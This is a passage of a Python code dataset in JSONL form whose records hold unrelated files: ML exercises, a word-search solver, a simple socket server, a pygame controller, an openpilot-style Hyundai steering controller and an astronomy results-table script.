plt.close(fig)\n","sub_path":"gan/generator_vae.py","file_name":"generator_vae.py","file_ext":"py","file_size_in_byte":4387,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"365683502","text":"import sys\nimport os.path\n\n# Remove paths from sys.path that don't fall within our\n# app binary, except if they are system paths;\n# this is intended to provide isolation from user python\n# packages.\n\nnewpath = []\nbase_path = os.path.dirname(__file__)\nfor p in sys.path:\n if( p.startswith(base_path) or\n p.startswith('/System/Library/') or\n p.startswith('/usr/lib') ):\n \tnewpath.append(p)\nsys.path = newpath\n","sub_path":"src/steamshovel/resources/Steamshovelapp/Contents/Frameworks/usercustomize.py","file_name":"usercustomize.py","file_ext":"py","file_size_in_byte":427,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"294333404","text":"class Solution(object):\n def exist(self, board, word):\n \"\"\"\n :type board: List[List[str]]\n :type word: str\n :rtype: bool\n \"\"\"\n if board is None or word is None or len(board) < 1 or len(board[0]) < 1:\n return False\n isVisited = [[False for i in range(len(board[0]))] for j in range(len(board))]\n for i in range(len(board)):\n for j in range(len(board[0])):\n if self.dfs(board, i, j, word, 0, isVisited):\n return True\n return False\n \n def dfs(self, board, i, j, word, cursor, isVisited):\n \"\"\"\n dfs word from point (i,j)\n \"\"\"\n if i < 0 or i > len(board)-1 or j < 0 or j > len(board[0])-1 or isVisited[i][j] or board[i][j] != word[cursor]:\n return False\n if cursor == len(word) - 1:\n return True\n isVisited[i][j] = True\n flag = self.dfs(board, i-1, j, word, cursor+1, isVisited) or self.dfs(board, i+1, j, word, cursor+1, isVisited) or self.dfs(board, i, j-1, word, cursor+1, isVisited) or self.dfs(board, i, j+1, word, cursor+1, isVisited)\n isVisited[i][j] = False\n return flag\n","sub_path":"Python/WordSearch.py","file_name":"WordSearch.py","file_ext":"py","file_size_in_byte":1191,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"626671558","text":"import socket\n\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\nhost = 
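The commented-out training block in generator_vae.py above uses the standard closed-form KL divergence between the encoder posterior Q = N(mu, exp(z_logvar)) and the unit-Gaussian prior: 0.5 * sum(exp(logvar) + mu^2 - 1 - logvar) per sample, which is exactly its kl_loss expression. A NumPy restatement for checking:

import numpy as np

def kl_gaussian(mu, logvar):
    # KL( N(mu, exp(logvar)) || N(0, I) ), summed over latent dimensions
    return 0.5 * np.sum(np.exp(logvar) + mu**2 - 1.0 - logvar, axis=1)

# kl_gaussian(np.zeros((1, 4)), np.zeros((1, 4))) -> array([0.])  # Q == prior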
socket.gethostname() \nport = 12345 \ns.bind((host, port)) \ns.listen(5)\n\nwhile True :\n c, addr = s.accept() \n print(addr)\n\n planes = [\"26.8022\", \"30.8888\",\n \t\t\t \"25.8022\", \"35.8888\",\n \t\t\t \"23.8022\", \"33.8888\"]\n c.send(bytes(str(len(planes)), 'utf-8'))\n for plane in planes:\n \tc.send(bytes(plane, 'utf-8'))\n c.close()\n","sub_path":"server/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":444,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"107363972","text":"import pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom sklearn.naive_bayes import GaussianNB\nfrom sklearn.model_selection import cross_val_score, GridSearchCV, train_test_split\nplt.style.use(style='ggplot')\nplt.rcParams['figure.figsize'] = (10, 6)\ntrain_test_split_1 = pd.read_csv('./glass.csv')\ntrain_df, test_df = train_test_split(train_test_split_1, test_size=0.5, random_state=0)\n\nX_train = train_df.drop(\"Type\",axis=1)\nY_train = train_df[\"Type\"]\nmodel = GaussianNB()\nmodel.fit(X_train, Y_train)\nX_test = test_df.drop(\"Type\",axis=1).copy()\nY_test = model.predict(X_test)\nacc_svc = round(model.score(X_train, Y_train) * 100, 2)\nprint(\"NB accuracy is:\", acc_svc)\n\nplt.hist(Y_train,color='blue')\nplt.xlabel('Type')\nplt.ylabel('Count')\nplt.title('BN Model')\nplt.show()\nplt.scatter(Y_test, test_df[\"Type\"], alpha=.75,\n color='b') #alpha helps to show overlapping data\nplt.xlabel('Predicted Price')\nplt.ylabel('Actual Price')\nplt.title('BN Model')\nplt.show()","sub_path":"ICP/ICP4/NaïveBayes.py","file_name":"NaïveBayes.py","file_ext":"py","file_size_in_byte":988,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"138417582","text":"# ------ Controller ------ #\n#\n#\n# functions to run to handle user imput\n#\n\n# ------ Import Libraries and Modules ------ #\nimport pygame,random,math\nfrom ..Assets import vars\nfrom ..Assets import settings\nimport babelLib as general\nimport GameData.Scripts.blocks as blocks\nimport GameData.Scripts.workers as workers\n\nclass Controller():\n \"\"\"\n Class object that handles all player input and subsequent actions.\n \"\"\"\n def __init__(self,pathList):\n self.openWindow = True # exit program flag\n self.keys = None # holds pressed keys\n \n self.container = None\n\n self.pathList = pathList # temporary\n\n def addContainer(self,container): # add container object\n self.container = container\n\n def update(self):\n \"\"\"\n Every frame this will iterate over all user input events and decide what to do with each one. Can either use get_pressed() or event.get(). Not sure which is better, if only one should be used, or if both is fine\n \"\"\"\n \n \"\"\"\n Begin with state system where we look at states of keys. This method has the advantage of greater precision for timing and low latency but if the loop doesnt run right as you press the button you may miss a command. 
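The NaïveBayes record above reports model.score on the *training* split as "NB accuracy" and never compares Y_test against the held-out labels (they only appear in the scatter plot). Held-out accuracy is one extra call; train_df and test_df are the frames from the record:

from sklearn.metrics import accuracy_score
from sklearn.naive_bayes import GaussianNB

model = GaussianNB().fit(train_df.drop("Type", axis=1), train_df["Type"])
pred = model.predict(test_df.drop("Type", axis=1))
print("NB held-out accuracy:", round(accuracy_score(test_df["Type"], pred) * 100, 2))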
Use this for things like scrolling where it isnt as important if a single event is missed.\n \"\"\"\n # --- Scrolling\n self.keys = pygame.key.get_pressed()\n if self.keys[pygame.K_LEFT] or self.keys[pygame.K_a]:\n if self.container.worldGrid.left_edgeIndex > 0: # respect bounds of worldGrid\n self.container.worldGrid.scroll(settings.control_ScrollSpeed,0)\n if self.keys[pygame.K_RIGHT] or self.keys[pygame.K_d]:\n if self.container.worldGrid.right_edgeIndex < self.container.worldGrid.gridX: # respect bounds of worldGrid\n self.container.worldGrid.scroll(-1*settings.control_ScrollSpeed,0)\n if self.keys[pygame.K_UP] or self.keys[pygame.K_w]:\n if self.container.worldGrid.top_edgeIndex > 0: # respect bounds of worldGrid\n self.container.worldGrid.scroll(0,settings.control_ScrollSpeed)\n if self.keys[pygame.K_DOWN] or self.keys[pygame.K_s]:\n if self.container.worldGrid.bottom_edgeIndex < self.container.worldGrid.gridY: # respect bounds of worldGrid\n self.container.worldGrid.scroll(0,-1*settings.control_ScrollSpeed)\n\n # --- Creating new blocks\n if pygame.mouse.get_pressed()[2]: # right click held down\n self.container.worldGrid.new_Block(self.container.worldGrid.get_Index(pygame.mouse.get_pos()),onScreen=True)\n \n \"\"\"\n Next do the event system. This has a higher latency but wont miss any inputs if they are made when the control loop isn't running. Use this for slower things like selecting where timing precision isnt as important but action completion is.\n \"\"\"\n for event in pygame.event.get():\n # --- quit game\n if event.type == pygame.QUIT: # If user clicked close\n self.openWindow = False # Flag that we are done so the program closes\n\n # --- key down events\n if event.type == pygame.KEYDOWN:\n #print event\n if event.unicode == u'=': self.container.worldGrid.zoom(\"In\")\n if event.unicode == u'-': self.container.worldGrid.zoom(\"Out\")\n \n # ------ Testing Controls ------ #\n \n # --- pathfinding\n# elif event.type == pygame.MOUSEBUTTONUP: # mouse button released\n# if event.button == 1: # left click\n# self.container.pathFinder.update(event.pos,self.container.block_Sprites)\n","sub_path":"GameData/Scripts/controller.py","file_name":"controller.py","file_ext":"py","file_size_in_byte":3742,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"46062503","text":"# BF算法 蛮力法解决字符串匹配问题\n# 获取输入\nprint(\"This is a BF algorithm\")\nmainStr = input(\"Please enter a main string:\")\nsubStr = input(\"Please enter a matched string:\")\n# 求长度\nn = len(mainStr)\nm = len(subStr)\n# 判断字符串是否有效\nif(m > n):\n print(\"The main string should larger than matched string!\")\nelse:\n i = 0 # 主串浮动指针\n j = 0 # 子串浮动指针\n while(i < (n-m+1)): # 当主串指针已经到n-m+1时,肯定无法匹配\n while(j < m): # 子串的指针不超过其长度m\n if(mainStr[i] != subStr[j]): # 如果对应字符不相等,则跳出内循环\n i=i-j+1########################\n j=0\n break\n else: # 如果相等,继续比较\n i = i+1\n j = j+1\n if(j == m): # 跳出内循环后测试是否已经完成了匹配\n print(\"The string are matched in \"+str(i-m+1)+\"character\")\n if(i >= (n-m+1) and j != m): # 测��当i全部尝试匹配时,j是否没有完成匹配\n print(\"The string didn't match.\")\n\n","sub_path":"lab1/BF.py","file_name":"BF.py","file_ext":"py","file_size_in_byte":1126,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"425392666","text":"from cereal import car, log\nfrom selfdrive.car import apply_std_steer_torque_limits\nfrom selfdrive.car.hyundai.hyundaican import create_lkas11, create_clu11, create_lfa_mfa, create_mdps12, create_ems11\nfrom 
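The BF.py record above (its Chinese comments label i and j as the floating pointers over the main and matched strings) has a subtle flaw: after reporting a match it never advances i or resets j, so a match that completes while i is still below n-m+1 (e.g. main 'ababab', pattern 'ab') re-prints the result forever. An idiomatic restatement that terminates, returning the same 1-based position the record prints:

def bf_match(text, pattern):
    n, m = len(text), len(pattern)
    for i in range(n - m + 1):          # candidate start positions in text
        for j in range(m):
            if text[i + j] != pattern[j]:
                break                   # mismatch: slide the window by one
        else:
            return i + 1                # 1-based position, as the record prints
    return -1

# bf_match('hello', 'll') -> 3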
selfdrive.car.hyundai.values import Buttons, SteerLimitParams, CAR\nfrom opendbc.can.packer import CANPacker\nfrom selfdrive.config import Conversions as CV\nfrom common.numpy_fast import interp\n\n# speed controller\nfrom selfdrive.car.hyundai.spdcontroller import SpdController\nfrom selfdrive.car.hyundai.spdctrlSlow import SpdctrlSlow\nfrom selfdrive.car.hyundai.spdctrlNormal import SpdctrlNormal\n\nfrom common.params import Params\nimport common.log as trace1\nimport common.CTime1000 as tm\n\nVisualAlert = car.CarControl.HUDControl.VisualAlert\nLaneChangeState = log.PathPlan.LaneChangeState\n\n\nclass CarController():\n def __init__(self, dbc_name, CP, VM):\n self.CP = CP\n self.apply_steer_last = 0\n self.car_fingerprint = CP.carFingerprint\n self.packer = CANPacker(dbc_name)\n self.steer_rate_limited = False\n self.resume_cnt = 0\n self.lkas11_cnt = 0\n self.last_resume_frame = 0\n self.last_lead_distance = 0\n self.longcontrol = CP.openpilotLongitudinalControl\n\n\n\n self.nBlinker = 0\n self.lane_change_torque_lower = 0\n self.steer_torque_over_timer = 0\n self.steer_torque_ratio = 1\n self.steer_torque_ratio_dir = 1\n\n self.dRel = 0\n self.yRel = 0\n self.vRel = 0\n\n self.timer1 = tm.CTime1000(\"time\")\n self.model_speed = 0\n self.model_sum = 0\n \n # hud\n self.hud_timer_left = 0\n self.hud_timer_right = 0\n\n\n self.command_cnt = 0\n self.command_load = 0\n self.params = Params()\n\n # param\n self.param_preOpkrAccelProfile = -1\n self.param_OpkrAccelProfile = 0\n self.param_OpkrAutoResume = 0\n self.param_OpkrWhoisDriver = 0\n\n self.SC = None\n self.traceCC = trace1.Loger(\"CarController\")\n\n\n\n def limit_ctrl(self, value, limit, offset ):\n p_limit = offset + limit\n m_limit = offset - limit\n if value > p_limit:\n value = p_limit\n elif value < m_limit:\n value = m_limit\n return value\n\n\n def process_hud_alert(self, enabled, CC ):\n visual_alert = CC.hudControl.visualAlert\n left_lane = CC.hudControl.leftLaneVisible\n right_lane = CC.hudControl.rightLaneVisible\n\n sys_warning = (visual_alert == VisualAlert.steerRequired)\n\n if left_lane:\n self.hud_timer_left = 100\n\n if right_lane:\n self.hud_timer_right = 100\n\n if self.hud_timer_left:\n self.hud_timer_left -= 1\n \n if self.hud_timer_right:\n self.hud_timer_right -= 1\n\n\n # initialize to no line visible\n sys_state = 1\n if self.hud_timer_left and self.hud_timer_right or sys_warning: # HUD alert only display when LKAS status is active\n if (self.steer_torque_ratio > 0.7) and (enabled or sys_warning):\n sys_state = 3\n else:\n sys_state = 4\n elif self.hud_timer_left:\n sys_state = 5\n elif self.hud_timer_right:\n sys_state = 6\n\n return sys_warning, sys_state\n\n\n def cV_tune( self, v_ego, cv_value ): # cV(곡률에 의한 변화)\n self.sRKPHV = self.CP.lateralPIDatom.sRKPHV\n self.cVBPV = self.CP.lateralCVatom.cvBPV\n self.cvSteerMaxV1 = self.CP.lateralCVatom.cvSteerMaxV1\n self.cvSteerDeltaUpV1 = self.CP.lateralCVatom.cvSteerDeltaUpV1\n self.cvSteerDeltaDnV1 = self.CP.lateralCVatom.cvSteerDeltaDnV1\n self.cvSteerMaxV2 = self.CP.lateralCVatom.cvSteerMaxV2\n self.cvSteerDeltaUpV2 = self.CP.lateralCVatom.cvSteerDeltaUpV2\n self.cvSteerDeltaDnV2 = self.CP.lateralCVatom.cvSteerDeltaDnV2 \n\n cv_BPV = self.cVBPV # 곡률\n # Max\n self.steerMax1 = interp( cv_value, cv_BPV, self.cvSteerMaxV1 )\n self.steerMax2 = interp( cv_value, cv_BPV, self.cvSteerMaxV2 )\n self.steerMaxV = [ float(self.steerMax1), float(self.steerMax2) ]\n self.MAX = interp( v_ego, self.sRKPHV, self.steerMaxV ) \n\n # Up\n self.steerUP1 = interp( cv_value, 
cv_BPV, self.cvSteerDeltaUpV1 )\n self.steerUP2 = interp( cv_value, cv_BPV, self.cvSteerDeltaUpV2 )\n self.steerUPV = [ float(self.steerUP1), float(self.steerUP2) ]\n self.UP = interp( v_ego, self.sRKPHV, self.steerUPV )\n\n # dn\n self.steerDN1 = interp( cv_value, cv_BPV, self.cvSteerDeltaDnV1 )\n self.steerDN2 = interp( cv_value, cv_BPV, self.cvSteerDeltaDnV2 ) \n self.steerDNV = [ float(self.steerDN1), float(self.steerDN2) ]\n self.DN = interp( v_ego, self.sRKPHV, self.steerDNV )\n\n\n\n def steerParams_torque(self, CS, abs_angle_steers, path_plan, CC ):\n param = SteerLimitParams()\n v_ego_kph = CS.out.vEgo * CV.MS_TO_KPH\n\n self.cV_tune( CS.out.vEgo, self.model_speed )\n param.STEER_MAX = min( param.STEER_MAX, self.MAX)\n param.STEER_DELTA_UP = min( param.STEER_DELTA_UP, self.UP)\n param.STEER_DELTA_DOWN = min( param.STEER_DELTA_DOWN, self.DN )\n\n\n # streer over check\n if v_ego_kph > 5 and abs( CS.out.steeringTorque ) > 510: #사용자 핸들 토크\n self.steer_torque_over_timer = 1\n else:\n self.steer_torque_over_timer = 0\n\n\n if CS.out.leftBlinker or CS.out.rightBlinker:\n self.nBlinker += 1\n elif self.nBlinker:\n self.nBlinker = 0\n\n # 차선이 없고 앞차량이 없으면.\n steer_angle_lower = self.dRel > 20 and (not CC.hudControl.leftLaneVisible and not CC.hudControl.rightLaneVisible)\n\n if v_ego_kph < 1:\n self.steer_torque_over_timer = 0\n self.steer_torque_ratio_dir = 1\n elif path_plan.laneChangeState != LaneChangeState.off:\n self.steer_torque_ratio_dir = 1\n self.steer_torque_over_timer = 0\n self.nBlinker = 0\n elif self.steer_torque_over_timer: #or CS.out.steerWarning:\n self.steer_torque_ratio_dir = -1\n elif steer_angle_lower:\n param.STEER_MAX *= 0.8\n param.STEER_DELTA_UP = 2\n param.STEER_DELTA_DOWN = 4\n self.steer_torque_ratio_dir = 1 \n else:\n self.steer_torque_ratio_dir = 1\n\n lane_change_torque_lower = 0\n if self.nBlinker > 10 and v_ego_kph > 1:\n lane_change_torque_lower = int(CS.out.leftBlinker) + int(CS.out.rightBlinker) * 2\n if CS.out.steeringPressed and self.param_OpkrWhoisDriver:\n self.steer_torque_ratio = 0.05 \n\n self.lane_change_torque_lower = lane_change_torque_lower\n\n # smoth torque enable or disable\n ratio_pval = 0.001 # 10 sec\n ratio_mval = 0.001 # 10 sec\n if self.param_OpkrWhoisDriver == 1: # 높음\n ratio_pval = 0.005 # 2 sec\n ratio_mval = 0.005 # 0.5 sec\n if self.param_OpkrWhoisDriver == 2: # 중간\n ratio_pval = 0.002 # 5 sec \n ratio_mval = 0.002 # 0.5 sec \n else: # 낮음.\n ratio_pval = 0.001 # 10 sec \n ratio_mval = 0.001 # 0.5 sec \n\n if self.param_OpkrWhoisDriver == 0:\n self.steer_torque_ratio = 1\n elif self.steer_torque_ratio_dir >= 1:\n if self.steer_torque_ratio < 1:\n self.steer_torque_ratio += ratio_pval \n elif self.steer_torque_ratio_dir <= -1:\n if self.steer_torque_ratio > 0:\n self.steer_torque_ratio -= ratio_mval \n\n if self.steer_torque_ratio < 0:\n self.steer_torque_ratio = 0\n elif self.steer_torque_ratio > 1:\n self.steer_torque_ratio = 1\n\n #print( 'self.steer_torque_ratio={} {}{} self.param_OpkrWhoisDriver={}'.format( self.steer_torque_ratio, ratio_mval, ratio_pval, self.param_OpkrWhoisDriver ) )\n\n return param\n\n def param_load(self ):\n self.command_cnt += 1\n if self.command_cnt > 100:\n self.command_cnt = 0\n\n if self.command_cnt % 10:\n return\n\n self.command_load += 1\n if self.command_load == 1:\n self.param_OpkrAccelProfile = int(self.params.get('OpkrAccelProfile')) \n elif self.command_load == 2:\n self.param_OpkrAutoResume = int(self.params.get('OpkrAutoResume'))\n elif self.command_load == 3:\n self.param_OpkrWhoisDriver 
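cV_tune above is a two-stage table lookup: curvature (model_speed over the cvBPV breakpoints) picks per-speed endpoints, and vehicle speed over sRKPHV then blends between them. The same structure with numpy.interp and made-up numbers (openpilot's common.numpy_fast.interp behaves like np.interp for this purpose; none of the values below are from the record):

import numpy as np

cv_bp    = [30.0, 255.0]       # curvature breakpoints (assumed)
max_v1   = [380.0, 255.0]      # low-speed limit endpoints (assumed)
max_v2   = [360.0, 230.0]      # high-speed limit endpoints (assumed)
speed_bp = [0.0, 30.0]         # m/s breakpoints (assumed)

def steer_max(v_ego, cv_value):
    lo = np.interp(cv_value, cv_bp, max_v1)      # curvature -> low-speed limit
    hi = np.interp(cv_value, cv_bp, max_v2)      # curvature -> high-speed limit
    return np.interp(v_ego, speed_bp, [lo, hi])  # blend the two by speed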
= int(self.params.get('OpkrWhoisDriver'))\n else:\n self.command_load = 0\n\n # speed controller\n if self.param_preOpkrAccelProfile != self.param_OpkrAccelProfile:\n self.param_preOpkrAccelProfile = self.param_OpkrAccelProfile\n if self.param_OpkrAccelProfile == 1:\n self.SC = SpdctrlSlow()\n elif self.param_OpkrAccelProfile == 2:\n self.SC = SpdctrlNormal()\n else:\n self.SC = SpdctrlNormal() \n\n\n# CC:car.CarControl(car.capnp), CS:CarState CP:CarInterface.get_params\n def update(self, CC, CS, frame, sm, CP ):\n if self.CP != CP:\n self.CP = CP\n\n self.param_load()\n\n\n enabled = CC.enabled\n actuators = CC.actuators\n pcm_cancel_cmd = CC.cruiseControl.cancel\n\n\n path_plan = sm['pathPlan']\n\n abs_angle_steers = abs(actuators.steerAngle)\n\n self.dRel, self.yRel, self.vRel = SpdController.get_lead( sm )\n if self.SC is not None:\n self.model_speed, self.model_sum = self.SC.calc_va( sm, CS.out.vEgo )\n else:\n self.model_speed = self.model_sum = 0\n\n # Steering Torque\n param = self.steerParams_torque( CS, abs_angle_steers, path_plan, CC )\n\n\n new_steer = actuators.steer * param.STEER_MAX\n apply_steer = apply_std_steer_torque_limits(new_steer, self.apply_steer_last, CS.out.steeringTorque, param)\n self.steer_rate_limited = new_steer != apply_steer\n\n apply_steer_limit = param.STEER_MAX\n if self.steer_torque_ratio < 1:\n apply_steer_limit = int(self.steer_torque_ratio * param.STEER_MAX)\n apply_steer = self.limit_ctrl( apply_steer, apply_steer_limit, 0 )\n\n\n # disable if steer angle reach 90 deg, otherwise mdps fault in some models\n lkas_active = enabled and abs(CS.out.steeringAngle) < 180. #and self.lkas_button\n\n # fix for Genesis hard fault at low speed\n #if CS.out.vEgo < 16.666667 and self.car_fingerprint == CAR.GENESIS:\n # lkas_active = 0\n\n if not lkas_active:\n apply_steer = 0\n\n steer_req = 1 if apply_steer else 0\n\n self.apply_steer_last = apply_steer\n\n sys_warning, sys_state = self.process_hud_alert( lkas_active, CC )\n\n clu11_speed = CS.clu11[\"CF_Clu_Vanz\"]\n enabled_speed = 38 if CS.is_set_speed_in_mph else 60\n if clu11_speed > enabled_speed or not lkas_active:\n enabled_speed = clu11_speed\n\n can_sends = []\n if frame == 0: # initialize counts from last received count signals\n self.lkas11_cnt = CS.lkas11[\"CF_Lkas_MsgCount\"] + 1\n self.lkas11_cnt %= 0x10\n\n can_sends.append(create_lkas11(self.packer, self.lkas11_cnt, self.car_fingerprint, apply_steer, steer_req,\n CS.lkas11, sys_warning, sys_state, CC, enabled, 0 ))\n if CS.mdps_bus or CS.scc_bus == 1: # send lkas11 bus 1 if mdps is on bus 1 \n can_sends.append(create_lkas11(self.packer, self.lkas11_cnt, self.car_fingerprint, apply_steer, steer_req,\n CS.lkas11, sys_warning, sys_state, CC, enabled, 1 ))\n if CS.mdps_bus: # send clu11 to mdps if it is not on bus 0\n can_sends.append(create_clu11(self.packer, frame, CS.mdps_bus, CS.clu11, Buttons.NONE, enabled_speed))\n\n #if pcm_cancel_cmd and self.longcontrol:\n # can_sends.append(create_clu11(self.packer, frame, CS.scc_bus, CS.clu11, Buttons.CANCEL, clu11_speed))\n #else: # send mdps12 to LKAS to prevent LKAS error if no cancel cmd\n can_sends.append(create_mdps12(self.packer, frame, CS.mdps12))\n\n #str_log1 = 'CV={:5.1f}/{:5.3f} torg:{:5.0f}'.format( self.model_speed, self.model_sum, apply_steer )\n str_log1 = 'CV={:5.1f} torg:{:6.1f}'.format( self.model_speed, apply_steer )\n #str_log2 = 'limit={:.0f} tm={:.1f} '.format( apply_steer_limit, self.timer1.sampleTime() )\n str_log2 = ' limit={:6.1f}/tm={:3.1f} MAX={:5.1f} UP/DN={:3.1f}/{:3.1f} 
'.format( apply_steer_limit, self.timer1.sampleTime(), self.MAX, self.UP, self.DN )\n trace1.printf( '{} {}'.format( str_log1, str_log2 ) )\n \n run_speed_ctrl = self.param_OpkrAccelProfile and CS.acc_active and self.SC != None\n if not run_speed_ctrl:\n str_log2 = 'U={:.0f} LK={:.0f} dir={} steer={:5.0f} '.format( CS.Mdps_ToiUnavail, CS.lkas_button_on, self.steer_torque_ratio_dir, CS.out.steeringTorque )\n trace1.printf2( '{}'.format( str_log2 ) )\n\n if pcm_cancel_cmd and self.CP.longcontrolEnabled:\n can_sends.append(create_clu11(self.packer, frame, CS.clu11, Buttons.CANCEL))\n\n elif CS.out.cruiseState.standstill:\n # run only first time when the car stopped\n if self.last_lead_distance == 0 or not self.param_OpkrAutoResume:\n # get the lead distance from the Radar\n self.last_lead_distance = CS.lead_distance\n self.resume_cnt = 0\n # when lead car starts moving, create 6 RES msgs\n elif CS.lead_distance != self.last_lead_distance < CS.lead_distance > 4.8 and (frame - self.last_resume_frame) > 5:\n can_sends.append(create_clu11(self.packer, frame, CS.scc_bus, CS.clu11, Buttons.RES_ACCEL, clu11_speed))\n self.resume_cnt += 1\n # interval after 10 msgs\n if self.resume_cnt > 10:\n self.last_resume_frame = frame\n self.resume_cnt = 0\n self.clu11_cnt = 0\n # reset lead distnce after the car starts moving\n elif self.last_lead_distance != 0:\n self.last_lead_distance = 0\n elif run_speed_ctrl and self.SC != None:\n is_sc_run = self.SC.update( CS, sm, self )\n if is_sc_run:\n can_sends.append(create_clu11(self.packer, self.resume_cnt, CS.scc_bus, CS.clu11, self.SC.btn_type, self.SC.sc_clu_speed ))\n self.resume_cnt += 1\n else:\n self.resume_cnt = 0\n\n str1 = 'run={} cruise_set_mode={} kph={:.1f}/{:.1f} DO={:.0f}/{:.0f} '.format( is_sc_run, self.SC.cruise_set_mode, self.SC.cruise_set_speed_kph, CS.VSetDis, CS.driverOverride, CS.cruise_buttons)\n str2 = 'btn_type={:.0f} speed={:.1f} cnt={:.0f}'.format( self.SC.btn_type, self.SC.sc_clu_speed, self.resume_cnt )\n str_log = str1 + str2\n self.traceCC.add( str_log ) \n\n\n # 20 Hz LFA MFA message\n if frame % 5 == 0 and self.car_fingerprint in [CAR.PALISADE, CAR.SELTOS]:\n can_sends.append(create_lfa_mfa(self.packer, frame, enabled))\n\n # counter inc\n self.lkas11_cnt += 1\n return can_sends\n","sub_path":"selfdrive/car/hyundai/carcontroller.py","file_name":"carcontroller.py","file_ext":"py","file_size_in_byte":14093,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"352356588","text":"import sys\nimport os, os.path\nimport math\nimport numpy\nimport cPickle as pickle\nfrom optparse import OptionParser\n_RICHDBLEXPNAMES= ['HWR_dens_rich_g.sav',\n 'HWR_dens_rich_gbright.sav',\n 'HWR_dens_rich_gfaint.sav',\n 'HWR_dens_rich_g_south.sav',\n 'HWR_dens_rich_g_north.sav',\n 'HWR_dens_rich_g_bmin45.sav',\n 'HWR_dens_rich_g_bmax45.sav']\n_RICHFLARENAMES= ['HWR_dens_rich_g_flare.sav',\n 'HWR_dens_rich_gbright_flare.sav',\n 'HWR_dens_rich_gfaint_flare.sav',\n 'HWR_dens_rich_gsouth_flare.sav',\n 'HWR_dens_rich_gnorth_flare.sav',\n 'HWR_dens_rich_gbmin45_flare.sav',\n 'HWR_dens_rich_gbmax45_flare.sav']\n_RICHTWODBLEXPNAMES= ['HWR_dens_rich_g_twodblexp.sav',\n 'HWR_dens_rich_gbright_twodblexp.sav',\n 'HWR_dens_rich_gfaint_twodblexp.sav',\n 'HWR_dens_rich_gsouth_twodblexp.sav',\n 'HWR_dens_rich_gnorth_twodblexp.sav',\n 'HWR_dens_rich_gbmin45_twodblexp.sav',\n 'HWR_dens_rich_gbmax45_twodblexp.sav']\n_POORDBLEXPNAMES= ['HWR_dens_poor_g.sav',\n 'HWR_dens_poor_gbright.sav',\n 'HWR_dens_poor_gfaint.sav',\n 
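apply_std_steer_torque_limits, imported at the top of the carcontroller record, is not shown here; its role in update above is to bound both the absolute torque command and its frame-to-frame step before the value is clipped again by steer_torque_ratio. A simplified sketch of those two clamps (the real helper also factors in measured driver torque and treats ramp-up and ramp-down asymmetrically, which this omits):

def rate_limited_torque(desired, last, max_val, max_step):
    # clamp the change between consecutive frames
    new = max(last - max_step, min(desired, last + max_step))
    # clamp the absolute command
    return max(-max_val, min(new, max_val))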
'HWR_dens_poor_g_south.sav',\n 'HWR_dens_poor_g_north.sav',\n 'HWR_dens_poor_g_bmin45.sav',\n 'HWR_dens_poor_g_bmax45.sav']\n_POORFLARENAMES= ['HWR_dens_poor_g_flare.sav',\n 'HWR_dens_poor_gbright_flare.sav',\n 'HWR_dens_poor_gfaint_flare.sav',\n 'HWR_dens_poor_gsouth_flare.sav',\n 'HWR_dens_poor_gnorth_flare.sav',\n 'HWR_dens_poor_gbmin45_flare.sav',\n 'HWR_dens_poor_gbmax45_flare.sav']\n_POORTWODBLEXPNAMES= ['HWR_dens_poor_g_twodblexp.sav',\n 'HWR_dens_poor_gbright_twodblexp.sav',\n 'HWR_dens_poor_gfaint_twodblexp.sav',\n 'HWR_dens_poor_gsouth_twodblexp.sav',\n 'HWR_dens_poor_gnorth_twodblexp.sav',\n 'HWR_dens_poor_gbmin45_twodblexp.sav',\n 'HWR_dens_poor_gbmax45_twodblexp.sav']\n_RICHFEHNAMES= ['HWR_dens_richpoorest_g_twodblexp.sav',\n 'HWR_dens_richpoor_g_twodblexp.sav']\n_RICHAFENAMES= ['HWR_dens_apoorpoor_g_twodblexp.sav',\n 'HWR_dens_apoorrich_g_twodblexp.sav']\n_POORFEHNAMES= ['HWR_dens_poorpoor_g_twodblexp.sav',\n 'HWR_dens_poorrich_g_twodblexp.sav']\n_POORAFENAMES= ['HWR_dens_arichpoor_g_twodblexp.sav',\n 'HWR_dens_arichrich_g_twodblexp.sav']\ndef resultsTable(parser):\n (options,args)= parser.parse_args()\n cmdline= '%python resultsTable.py '+args[0]+' --table='+options.table\n if len(args) == 0:\n parser.print_help()\n return\n #Set up sections\n if options.table.lower() == 'richresults':\n #sections= [_RICHDBLEXPNAMES,_RICHFLARENAMES,_RICHTWODBLEXPNAMES,\n # _RICHFEHNAMES]\n #format= ['hz','hR','hz1','hR1','a2','hf','ac']\n sections= [_RICHDBLEXPNAMES,_RICHTWODBLEXPNAMES,\n _RICHFEHNAMES,_RICHAFENAMES]\n format= ['hz','hR','hz1','hR1','a2','ac']\n elif options.table.lower() == 'poorresults':\n #sections= [_POORDBLEXPNAMES,_POORFLARENAMES,_POORTWODBLEXPNAMES,\n # _POORFEHNAMES]\n #format= ['hz','hR','hz1','hR1','a2','hf','ac']\n sections= [_POORDBLEXPNAMES,_POORTWODBLEXPNAMES,\n _POORFEHNAMES,_POORAFENAMES]\n format= ['hz','hR','hz1','hR1','a2','ac']\n elif options.table.lower() == 'afe':\n sections= [_AFENAMES]\n format= ['hz','hR','hz1','hR1','a2'] #just list the two-dblexp parameters\n #Make table\n outfile= open(args[0],'w')\n for section in sections:\n for name in section:\n #Open savefile\n savefile= open(os.path.join('..','fits',name),'rb')\n params= pickle.load(savefile)\n samples= pickle.load(savefile)\n savefile.close()\n if 'twodblexp' in name.lower():\n paramnames= ['hz','hz1','hR','hR1','a2']\n elif 'flare' in name.lower():\n paramnames= ['hz','hf','hR']\n else:\n paramnames= ['hz','hR','ac']\n thisline= {}\n for ii in range(len(paramnames)):\n xs= numpy.array([s[ii] for s in samples])\n if 